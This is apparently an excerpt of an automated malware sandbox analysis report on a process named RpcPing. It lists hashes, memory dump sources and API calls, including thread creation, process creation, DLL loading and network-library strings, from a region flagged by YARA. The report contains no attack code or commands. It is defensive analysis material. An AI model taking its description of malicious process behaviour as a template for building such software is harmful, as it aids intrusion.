                                  • Instruction Fuzzy Hash: 7490027120140C02D180B158480464A000D87E1301F96C016A4025654DCB198B5977B1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7537a613781fde24e05f1a9de5e752c321312bf0e8c6db59eb36b9504f8caa21
                                  • Instruction ID: bf321657539743ba03964d0433fede22c57df4b433a95d008fdffcb362711da6
                                  • Opcode Fuzzy Hash: 7537a613781fde24e05f1a9de5e752c321312bf0e8c6db59eb36b9504f8caa21
                                  • Instruction Fuzzy Hash: C89002A1202404034105B1584814616400E87F0201B56C022E5014590DC62989916135
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 87bec986abcb4382157eaf90aed26baae99e12e9cccaa0b81b28dc2c135ef034
                                  • Instruction ID: 849fbc98a7a91a8e55bb5074f988914697cbd3ad251af35db7655301eb2e8c11
                                  • Opcode Fuzzy Hash: 87bec986abcb4382157eaf90aed26baae99e12e9cccaa0b81b28dc2c135ef034
                                  • Instruction Fuzzy Hash: 83900265221404020145F5580A0450B044D97E6351396C016F5416590CC72589655331
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c29ee1e983cc1e2ed41b065a3ca44147e3d967c8974565d1caa469c64e986e5f
                                  • Instruction ID: 098a313786304e94478a64bf5a5ecbbb258a2c261502fcc649754c0f0aacbb84
                                  • Opcode Fuzzy Hash: c29ee1e983cc1e2ed41b065a3ca44147e3d967c8974565d1caa469c64e986e5f
                                  • Instruction Fuzzy Hash: C6900475311404030105F55C0F04507004FC7F5351357C033F5015550CD735CD715131
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 85e7d97f32826b2744f376465c05364689e2154cc6b43c01f53a9caee547ec5b
                                  • Instruction ID: 52267a7344ad09b650557a675547a0e0e4463953bd99f26d3a294feb496c100c
                                  • Opcode Fuzzy Hash: 85e7d97f32826b2744f376465c05364689e2154cc6b43c01f53a9caee547ec5b
                                  • Instruction Fuzzy Hash: 17900261601404424140B1688C44906400DABF1211756C122A4998550D865D89655675
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9bd0cae1c95e459c8e7b02762ab0dc4690233aab32e62ca8a037d81bb9a1883e
                                  • Instruction ID: fc67527abfad9e6aec37e4763981c29c5c2fc008a8fd1dc41fede3cee21b33b5
                                  • Opcode Fuzzy Hash: 9bd0cae1c95e459c8e7b02762ab0dc4690233aab32e62ca8a037d81bb9a1883e
                                  • Instruction Fuzzy Hash: 51900261211C0442D200B5684C14B07000D87E0303F56C116A4154554CCA1989615531
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 69bebf61b7d9787f00a018a65d63f84291b56d392b5fd7c85e6df58eb8552660
                                  • Instruction ID: 70026fa448261b41dc769fd917cf948f37f5853fb8f96a7f0133eb7cd906299d
                                  • Opcode Fuzzy Hash: 69bebf61b7d9787f00a018a65d63f84291b56d392b5fd7c85e6df58eb8552660
                                  • Instruction Fuzzy Hash: E49002A134140842D100B1584814B06000DC7F1301F56C016E5064554D871DCD526136
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: dc3c3aa253a9cf73fcb09aa79cb4c6ffec916df4ed5e3b9392932230b1f633cd
                                  • Instruction ID: f2d5188b15bc6d35bec136e6e8fd388a8de732979f4e65381c183b9dd6f1ae40
                                  • Opcode Fuzzy Hash: dc3c3aa253a9cf73fcb09aa79cb4c6ffec916df4ed5e3b9392932230b1f633cd
                                  • Instruction Fuzzy Hash: 2B90026160140902D101B1584804616000E87E0241F96C023A5024555ECB298A92A131
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d5eb78a134d93c402b6957db5e63ba3a9cd6001a5783dc060318e2259eab2c5e
                                  • Instruction ID: c6659036da938c47c0e9e37636ea0ed9fb50e63dc16476220e4e641ec3557d8b
                                  • Opcode Fuzzy Hash: d5eb78a134d93c402b6957db5e63ba3a9cd6001a5783dc060318e2259eab2c5e
                                  • Instruction Fuzzy Hash: 039002A120180803D140B5584C04607000D87E0302F56C012A6064555E8B2D8D516135
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 79a33d354e3f94defcf6b2bde2a37332eb8cc419392576a47865b02c5bd7f041
                                  • Instruction ID: 7cca148de6ca945f01b2fe2e8c085bc8644d68f94d3cfcfe464e1167c5a7f3f5
                                  • Opcode Fuzzy Hash: 79a33d354e3f94defcf6b2bde2a37332eb8cc419392576a47865b02c5bd7f041
                                  • Instruction Fuzzy Hash: 2890027120140813D111B1584904707000D87E0241F96C413A4424558D975A8A52A131
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d2af3806b35ad065b389dbac2d89f8e3f094731c00d033107a6b7603fa5ec3b9
                                  • Instruction ID: 7c1a45da6b10201ae486c6dd0fd4936fafb2bf2dbc013ece1919de5ff915cb9c
                                  • Opcode Fuzzy Hash: d2af3806b35ad065b389dbac2d89f8e3f094731c00d033107a6b7603fa5ec3b9
                                  • Instruction Fuzzy Hash: 18900261242445525545F1584804507400E97F0241796C013A5414950C862A9956D631
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 67d9b1d0b646ccff665f0c5a951933ca25b13a2f504b43b99c567d2dd6dd6ff2
                                  • Instruction ID: 9c50b786cb2d1e11fc4c32381661b72c676ef0383af721e4beba4a693810fad9
                                  • Opcode Fuzzy Hash: 67d9b1d0b646ccff665f0c5a951933ca25b13a2f504b43b99c567d2dd6dd6ff2
                                  • Instruction Fuzzy Hash: CC90026130140403D140B1585818606400DD7F1301F56D012E4414554CDA1989565232
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 22d3ed1a494afb498ef1f4fb712d31e66a5cf976bd25c3db466dc179bc5baebf
                                  • Instruction ID: d5e662a185d3d39815de16c4ea9688fbea4c9dbca10ee8208c4257e825e6dc24
                                  • Opcode Fuzzy Hash: 22d3ed1a494afb498ef1f4fb712d31e66a5cf976bd25c3db466dc179bc5baebf
                                  • Instruction Fuzzy Hash: D790026921340402D180B158580860A000D87E1202F96D416A4015558CCA1989695331
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 432cca2d60923c327869333c11a21b4295f043432d12917d3ddec67df525e11d
                                  • Instruction ID: 654f4f229884e969f4ef419853925a3fde64dbe55afaa74efe6e6deee2ab8fd4
                                  • Opcode Fuzzy Hash: 432cca2d60923c327869333c11a21b4295f043432d12917d3ddec67df525e11d
                                  • Instruction Fuzzy Hash: 9590027120140802D100B5985808646000D87F0301F56D012A9024555EC76989916131
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 370f2e8d8883ff617dd22efadcebed479fe208c4d42464ca5ced072116bcab0e
                                  • Instruction ID: cf8b2d38e9117d45902ce9bf9ca5d6601794a094d7f4cca355bc4af138730012
                                  • Opcode Fuzzy Hash: 370f2e8d8883ff617dd22efadcebed479fe208c4d42464ca5ced072116bcab0e
                                  • Instruction Fuzzy Hash: 5190027120140C42D100B1584804B46000D87F0301F56C017A4124654D8719C9517531
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9528fe928536b445ed6f13f5c6ac731582e297ac93858d6a51c6588a05b883a8
                                  • Instruction ID: 557bc6e27ec720b912277e7f581aa9d89a756033ad66a9a08d4b6021766fadb7
                                  • Opcode Fuzzy Hash: 9528fe928536b445ed6f13f5c6ac731582e297ac93858d6a51c6588a05b883a8
                                  • Instruction Fuzzy Hash: 9E90027120148C02D110B158880474A000D87E0301F5AC412A8424658D879989917131
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 153237ab6b7729217e4d0387d5a8f4052743e563bd89fbc50fd379a97d3acecb
                                  • Instruction ID: b63b14434c8680ae5893c46a81964681b1bf6bb5f5be41f43a654d7be6a95941
                                  • Opcode Fuzzy Hash: 153237ab6b7729217e4d0387d5a8f4052743e563bd89fbc50fd379a97d3acecb
                                  • Instruction Fuzzy Hash: 3790027160550802D100B1584914706100D87E0201F66C412A4424568D87998A5165B2
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6d8555d3f5920c52be859338b7283084d427b9cfe993be1e1ac476788c1203d9
                                  • Instruction ID: dd9206eba8ac3693855e3e18e27653d16872c2db5a06e91c320dd79ce3acf13d
                                  • Opcode Fuzzy Hash: 6d8555d3f5920c52be859338b7283084d427b9cfe993be1e1ac476788c1203d9
                                  • Instruction Fuzzy Hash: 7490026124545502D150B15C4804616400DA7F0201F56C022A4814594D865989556231

                                  Control-flow Graph

                                  control_flow_graph 640 3270855-3270870 641 3270879-32708cb call 328b810 call 3273fc0 call 3261410 call 32815d0 640->641 642 3270874 call 328ae00 640->642 651 32708ed-32708f2 641->651 652 32708cd-32708de PostThreadMessageW 641->652 642->641 652->651 653 32708e0-32708ea 652->653 653->651
                                  APIs
                                  • PostThreadMessageW.USER32(297268BLQ,00000111,00000000,00000000), ref: 032708DA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 297268BLQ$297268BLQ
                                  • API String ID: 1836367815-2296095138
                                  • Opcode ID: dceb74c4f8592c0f7bef186faaa9cf2b859688af579800afc510d983fdef8bcd
                                  • Instruction ID: 6528cd30173fb97c71c506cc5639beeb47496eaaccf4fda0bc1186cf8bafefc6
                                  • Opcode Fuzzy Hash: dceb74c4f8592c0f7bef186faaa9cf2b859688af579800afc510d983fdef8bcd
                                  • Instruction Fuzzy Hash: 0611A571D513197AEB20E790CC42FDEBB7CAF41B50F048064EA04BF2C0D6B5A6468BE5

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(297268BLQ,00000111,00000000,00000000), ref: 032708DA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 297268BLQ$297268BLQ
                                  • API String ID: 1836367815-2296095138
                                  • Opcode ID: 283ed2202de7eb1392f61224755bb1a0f010f6a1e0e919a1d7a5d559b516e52d
                                  • Instruction ID: 54425c5508a86333dc8e59ad0636329af8966c3ac3e78aa893782b61c01399a2
                                  • Opcode Fuzzy Hash: 283ed2202de7eb1392f61224755bb1a0f010f6a1e0e919a1d7a5d559b516e52d
                                  • Instruction Fuzzy Hash: D8018075D5135876EB21E7908C02FDEBB7CAF41B50F058054FA047F2C0E6B8A6468BE6
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 0328350B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: a0168e23c3ca4a787e2cf6cc4416b9776ccd1bc88f791652532e8c7cd20bc9c6
                                  • Instruction ID: df66dcbdaed104720002fa0df99138fc03c307764b9e61c9d1e74fa56931e353
                                  • Opcode Fuzzy Hash: a0168e23c3ca4a787e2cf6cc4416b9776ccd1bc88f791652532e8c7cd20bc9c6
                                  • Instruction Fuzzy Hash: 203185B5A02305BBD714EF64CC80FEBB7B8FB48714F14451DE619AB280D6B4A691CB94
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InitializeUninitialize
                                  • String ID: @J7<
                                  • API String ID: 3442037557-2016760708
                                  • Opcode ID: b6df0256b635d881fa52d3357d2e0fa42485088ef7df0e764409a18a396e256a
                                  • Instruction ID: 799404762b480a7d23320beb96d75078c1681c023226d218d081adda3297d474
                                  • Opcode Fuzzy Hash: b6df0256b635d881fa52d3357d2e0fa42485088ef7df0e764409a18a396e256a
                                  • Instruction Fuzzy Hash: 56316FB5A1020AAFDB00DFD8DC809EEB7B9FF88304B108599E505EB254D775EE458BA1
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InitializeUninitialize
                                  • String ID: @J7<
                                  • API String ID: 3442037557-2016760708
                                  • Opcode ID: 062f768d66204f41fdb077760c21eef6e6bfac988a80e7da95e0b1427a08319f
                                  • Instruction ID: 61fd50ecccbb120fba47e489dd78de493bf9267602ad189581587c766ea32c10
                                  • Opcode Fuzzy Hash: 062f768d66204f41fdb077760c21eef6e6bfac988a80e7da95e0b1427a08319f
                                  • Instruction Fuzzy Hash: 4E3150B5A1020A9FDB00DFD8C8809EFB7B9FF88304B108599E505EB254D775EE45CBA1
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03274032
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 6555885b03e424912a974b2ad71a9bf35cbf2a7f4b5f4a85ec69b3e21490f823
                                  • Instruction ID: 7a1a0ba351a7b6d9db986724656c4da24872cc758e202829c70ae197c45e7539
                                  • Opcode Fuzzy Hash: 6555885b03e424912a974b2ad71a9bf35cbf2a7f4b5f4a85ec69b3e21490f823
                                  • Instruction Fuzzy Hash: 6E0121B9D5020EABDF10EBE4DC81FDDB7B8AB44208F044195E9099B281F671E795CBA1
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,03277D84,00000010,?,?,?,00000044,?,00000010,03277D84,?,?,?), ref: 03289123
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: f8d39a70e7a326d00996aa242ebb41c312e8b420268ed862805266e53e42b436
                                  • Instruction ID: 8e15ed15a21a1e33b43368b7dcf5ca2fb7f99c3dd8ae56bd902a81de2a3485b6
                                  • Opcode Fuzzy Hash: f8d39a70e7a326d00996aa242ebb41c312e8b420268ed862805266e53e42b436
                                  • Instruction Fuzzy Hash: EB01D6B2210108BBCB04DF99DC80EEB77ADAF8C714F008208FA09E7240D670F851CBA4
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03269B52
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 2e18b9001d6497b14de5ab2fde45fdfd86eccfe6ebd319a48636df162531b5e9
                                  • Instruction ID: 9eea3e045825a48b94e49fdfb97f0fdee6201d6b674f20a57d2f2fab45fcaa36
                                  • Opcode Fuzzy Hash: 2e18b9001d6497b14de5ab2fde45fdfd86eccfe6ebd319a48636df162531b5e9
                                  • Instruction Fuzzy Hash: 70F0E53725131436D230B29A9C02FDBB74C9F81BA0F280029F708AF3C1D9E5B58142F5
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03269B52
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: a443381210444d3302903a6eaa46989f52acb116039fb11582deab163a710814
                                  • Instruction ID: c7550954016181dfb7198716b6a09cbf513fb02d85d9679a2b084811419f926f
                                  • Opcode Fuzzy Hash: a443381210444d3302903a6eaa46989f52acb116039fb11582deab163a710814
                                  • Instruction Fuzzy Hash: 93F0303725131436D220A6A99C02FA7B38C9B85661F240525FB0DEB2C0D9A5B49142A5
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,10A8BFB7,00000007,00000000,00000004,00000000,03273849,000000F4), ref: 0328906C
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: 0b935935a9d9b665681f9f846ad136466a8349b47cf30abd535d1b6c75b0e6ef
                                  • Instruction ID: 3ba2051f41240f67dcab3b2a63e33df359cceb129f1e370ee3b02facb585ecf6
                                  • Opcode Fuzzy Hash: 0b935935a9d9b665681f9f846ad136466a8349b47cf30abd535d1b6c75b0e6ef
                                  • Instruction Fuzzy Hash: D1E06D752103047BC614EE58DC40EEB33ACEF84714F004018F909AB241C770B890CBB4
                                  APIs
                                  • RtlAllocateHeap.NTDLL(032714E9,?,032858B7,032714E9,0328501F,032858B7,?,032714E9,0328501F,00001000,?,?,00000000), ref: 0328901F
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
